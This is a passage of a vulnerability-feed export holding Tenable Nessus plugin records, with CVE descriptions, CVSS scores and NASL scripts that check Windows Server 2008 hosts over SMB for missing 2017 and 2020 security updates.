An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-0781, CVE-2020-0783)\");\n # https://support.microsoft.com/en-us/help/4541506/windows-server-2008-update-kb4541506\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3123a7c3\");\n # https://support.microsoft.com/en-us/help/4541504/windows-server-2008-update-kb4541504\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0805ef06\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4541504 or Cumulative Update KB4541506.\n\nPlease Note: These updates are only available through Microsoft's Extended Support Updates program.\nThis operating system is otherwise unsupported.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0883\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Background Intelligent Transfer Service Arbitrary File Move Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/03/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-03\";\nkbs = make_list('4541506', '4541504');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.0\",\n sp:2,\n rollup_date:\"03_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4541506, 4541504])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T16:22:24", "description": "The remote Windows host is missing multiple security updates released on 2017/05/09. 
It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the Windows improperly handles objects in memory.\n (CVE-2017-0077)\n\n - A denial of service vulnerability exists in Windows DNS Server if the server is configured to answer version queries. An attacker who successfully exploited this vulnerability could cause the DNS Server service to become nonresponsive. (CVE-2017-0171)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface+ (GDI+) handles objects in memory, allowing an attacker to retrieve information from a targeted system.\n (CVE-2017-0190)\n\n - An elevation of privilege vulnerability exists in the Windows COM Aggregate Marshaler due to an unspecified flaw. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in Windows due to improper validation of user-supplied input when loading type libraries. A local attacker can exploit this, via a specially crafted application, to gain elevated privileges. (CVE-2017-0214)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0175, CVE-2017-0220)\n\n - An information disclosure vulnerability exists in the way some ActiveX objects are instantiated. An attacker who successfully exploited this vulnerability could gain access to protected memory contents. (CVE-2017-0242)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions. 
On systems with Windows 7 for x64-based Systems or later installed, this vulnerability can lead to denial of service.\n (CVE-2017-0244)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system. (CVE-2017-0245)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. On computers with Windows 7 for x64-based systems or later installed, this vulnerability can lead to denial of service.\n (CVE-2017-0246)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.\n (CVE-2017-0258)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory.\n (CVE-2017-0263)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. 
An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. 
An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0280)\n\n - An information disclosure vulnerability exists in the GDI component due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to open a specially crafted document or visit a specially crafted website, to disclose the contents of memory. 
(CVE-2017-8552)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-09T00:00:00", "type": "nessus", "title": "Windows 2008 May 2017 Multiple Security Updates", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0077", "CVE-2017-0171", "CVE-2017-0175", "CVE-2017-0190", "CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0220", "CVE-2017-0242", "CVE-2017-0244", "CVE-2017-0245", "CVE-2017-0246", "CVE-2017-0258", "CVE-2017-0263", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280", "CVE-2017-8552"], "modified": "2022-03-29T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_MAY_WIN2008.NASL", "href": "https://www.tenable.com/plugins/nessus/100063", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100063);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/29\");\n\n script_cve_id(\n \"CVE-2017-0077\",\n \"CVE-2017-0171\",\n \"CVE-2017-0175\",\n \"CVE-2017-0190\",\n \"CVE-2017-0213\",\n \"CVE-2017-0214\",\n \"CVE-2017-0220\",\n \"CVE-2017-0242\",\n \"CVE-2017-0244\",\n \"CVE-2017-0245\",\n \"CVE-2017-0246\",\n \"CVE-2017-0258\",\n \"CVE-2017-0263\",\n \"CVE-2017-0267\",\n \"CVE-2017-0268\",\n \"CVE-2017-0269\",\n \"CVE-2017-0270\",\n \"CVE-2017-0271\",\n \"CVE-2017-0272\",\n \"CVE-2017-0273\",\n \"CVE-2017-0274\",\n \"CVE-2017-0275\",\n \"CVE-2017-0276\",\n \"CVE-2017-0277\",\n \"CVE-2017-0278\",\n \"CVE-2017-0279\",\n \"CVE-2017-0280\",\n \"CVE-2017-8552\"\n );\n script_bugtraq_id(\n 98097,\n 98102,\n 98103,\n 98108,\n 98109,\n 98110,\n 98111,\n 98112,\n 98114,\n 98115,\n 98258,\n 98259,\n 98260,\n 98261,\n 98263,\n 98264,\n 
98265,\n 98266,\n 98267,\n 98268,\n 98270,\n 98271,\n 98272,\n 98273,\n 98274,\n 98275,\n 98298\n );\n script_xref(name:\"MSKB\", value:\"4018196\");\n script_xref(name:\"MSKB\", value:\"4018466\");\n script_xref(name:\"MSKB\", value:\"4018556\");\n script_xref(name:\"MSKB\", value:\"4018821\");\n script_xref(name:\"MSKB\", value:\"4018885\");\n script_xref(name:\"MSKB\", value:\"4018927\");\n script_xref(name:\"MSKB\", value:\"4019149\");\n script_xref(name:\"MSKB\", value:\"4019204\");\n script_xref(name:\"MSKB\", value:\"4019206\");\n script_xref(name:\"MSFT\", value:\"MS17-4018196\");\n script_xref(name:\"MSFT\", value:\"MS17-4018466\");\n script_xref(name:\"MSFT\", value:\"MS17-4018556\");\n script_xref(name:\"MSFT\", value:\"MS17-4018821\");\n script_xref(name:\"MSFT\", value:\"MS17-4018885\");\n script_xref(name:\"MSFT\", value:\"MS17-4018927\");\n script_xref(name:\"MSFT\", value:\"MS17-4019149\");\n script_xref(name:\"MSFT\", value:\"MS17-4019204\");\n script_xref(name:\"MSFT\", value:\"MS17-4019206\");\n script_xref(name:\"IAVA\", value:\"2017-A-0148\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n\n script_name(english:\"Windows 2008 May 2017 Multiple Security Updates\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing multiple security updates released\non 2017/05/09. It is, therefore, affected by multiple\nvulnerabilities :\n\n - An elevation of privilege vulnerability exists when the\n Windows improperly handles objects in memory.\n (CVE-2017-0077)\n\n - A denial of service vulnerability exists in Windows DNS\n Server if the server is configured to answer version\n queries. 
An attacker who successfully exploited this\n vulnerability could cause the DNS Server service to\n become nonresponsive. (CVE-2017-0171)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface+ (GDI+)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system.\n (CVE-2017-0190)\n\n - An elevation of privilege vulnerability exists in the\n Windows COM Aggregate Marshaler due to an unspecified\n flaw. A local attacker can exploit this, via a specially\n crafted application, to execute arbitrary code with\n elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper validation of user-supplied\n input when loading type libraries. A local attacker can\n exploit this, via a specially crafted application, to\n gain elevated privileges. (CVE-2017-0214)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0175, CVE-2017-0220)\n\n - An information disclosure vulnerability exists in the\n way some ActiveX objects are instantiated. An attacker\n who successfully exploited this vulnerability could gain\n access to protected memory contents. (CVE-2017-0242)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions. 
On systems\n with Windows 7 for x64-based Systems or later installed,\n this vulnerability can lead to denial of service.\n (CVE-2017-0244)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the user's\n system. (CVE-2017-0245)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run processes in an elevated context. On computers\n with Windows 7 for x64-based systems or later installed,\n this vulnerability can lead to denial of service.\n (CVE-2017-0246)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2017-0258)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory.\n (CVE-2017-0263)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. 
An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. 
An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0280)\n\n - An information disclosure vulnerability exists in the\n GDI component due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n this, by convincing a user to open a specially crafted\n document or visit a specially crafted website, to\n disclose the contents of memory. 
(CVE-2017-8552)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4018196/title\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4018466/title\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4018556/title\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4018821/title\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4018885/title\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4018927/title\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4019149/title\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4019204/title\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4019206/title\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the following security updates :\n\n - KB4018196\n - KB4018466\n - KB4018556\n - KB4018821\n - KB4018885\n - KB4018927\n - KB4019149\n - KB4019204\n - KB4019206\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0272\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-05';\n\nkbs = make_list(\n \"4018196\", \n \"4018466\",\n \"4018556\",\n \"4018821\",\n \"4018885\",\n \"4018927\",\n \"4019149\",\n \"4019204\",\n \"4019206\"\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\n# KB4018196 Applies only to hosts having 'DNS Server' role installed\nregistry_init();\nhklm = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\ndns_role_installed = get_registry_value(\n handle:hklm,\n 
item:\"SYSTEM\\CurrentControlSet\\Services\\DNS\\DisplayName\"\n);\nRegCloseKey(handle:hklm);\nclose_registry(close:TRUE);\n\n# KBs only apply to Windows 2008\nif (hotfix_check_sp_range(vista:'2') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Vista\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nsystemroot = hotfix_get_systemroot();\nif (!systemroot) audit(AUDIT_PATH_NOT_DETERMINED, 'system root');\n\nport = kb_smb_transport();\nlogin = kb_smb_login();\npass = kb_smb_password();\ndomain = kb_smb_domain();\n\n\nif(! smb_session_init()) audit(AUDIT_FN_FAIL, 'smb_session_init');\n\nwinsxs = ereg_replace(pattern:'^[A-Za-z]:(.*)', replace:\"\\1\\WinSxS\", string:systemroot);\nwinsxs_share = hotfix_path2share(path:systemroot);\n\nrc = NetUseAdd(login:login, password:pass, domain:domain, share:winsxs_share);\nif (rc != 1)\n{\n NetUseDel();\n audit(AUDIT_SHARE_FAIL, winsxs_share);\n}\n\nthe_session = make_array(\n 'login', login,\n 'password', pass,\n 'domain', domain,\n 'share', winsxs_share\n);\n\nvuln = 0;\n\n# 4018196\nif (!isnull(dns_role_installed))\n{\n files = list_dir(basedir:winsxs, level:0, dir_pat:\"dns-server-service_31bf3856ad364e35_\", file_pat:\"^dns\\.exe$\", max_recurse:1);\n vuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19765','6.0.6002.24089'),\n max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4018196\", session:the_session);\n}\n\n# 4018466\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"smbserver-common_31bf3856ad364e35_\", file_pat:\"^srvnet\\.sys$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19673','6.0.6002.24089'),\n max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4018466\", session:the_session);\n\n# 4018556\nfiles = list_dir(basedir:winsxs, level:0, 
dir_pat:\"com-base-qfe-ole32_31bf3856ad364e35_\", file_pat:\"^ole32\\.dll$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19773','6.0.6002.24089'),\n max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4018556\", session:the_session);\n\n# 4018821\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"tdi-over-tcpip_31bf3856ad364e35_\", file_pat:\"^tdx\\.sys$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19762','6.0.6002.24087'),\n max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4018821\", session:the_session);\n\n# 4018885\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"tcpip-binaries_31bf3856ad364e35_\", file_pat:\"^tcpip\\.sys$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19763','6.0.6002.24087'),\n max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4018885\", session:the_session);\n\n# 4018927\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"rds-datafactory-dll_31bf3856ad364e35_\", file_pat:\"^msadcf\\.dll$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19770','6.0.6002.24089'),\n max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4018927\", session:the_session);\n\n# 4019149\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"lddmcore_31bf3856ad364e35_\", file_pat:\"^dxgkrnl\\.sys$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('7.0.6002.19765','7.0.6002.24089'),\n max_versions:make_list('7.0.6002.20000','7.0.6002.99999'),\n bulletin:bulletin,\n kb:\"4019149\", session:the_session);\n\n# 4019204\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"win32k_31bf3856ad364e35_\", 
file_pat:\"^win32k\\.sys$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19778','6.0.6002.24095'),\n max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4019204\", session:the_session);\n\n# 4019206\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"gdi32_31bf3856ad364e35_\", file_pat:\"^gdi32\\.dll$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19765','6.0.6002.24089'),\n max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4019206\", session:the_session);\n\nif (vuln > 0)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-11T15:53:28", "description": "The remote Windows host is missing security update 4556854 or cumulative update 4556860. It is, therefore, affected by multiple vulnerabilities :\n\n - A denial of service vulnerability exists when .NET Core or .NET Framework improperly handles web requests. An attacker who successfully exploited this vulnerability could cause a denial of service against a .NET Core or .NET Framework web application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the .NET Core or .NET Framework application. The update addresses the vulnerability by correcting how the .NET Core or .NET Framework web application handles web requests. (CVE-2020-1108)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory, allowing an attacker to retrieve information from a targeted system. 
By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2020-1141)\n\n - A denial of service vulnerability exists when Hyper-V on a Windows Server fails to properly handle specially crafted network packets. (CVE-2020-0909)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1072)\n\n - A security feature bypass vulnerability exists in Microsoft Windows when the Task Scheduler service fails to properly verify client connections over RPC. An attacker who successfully exploited this vulnerability could run arbitrary code as an administrator. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1113)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by 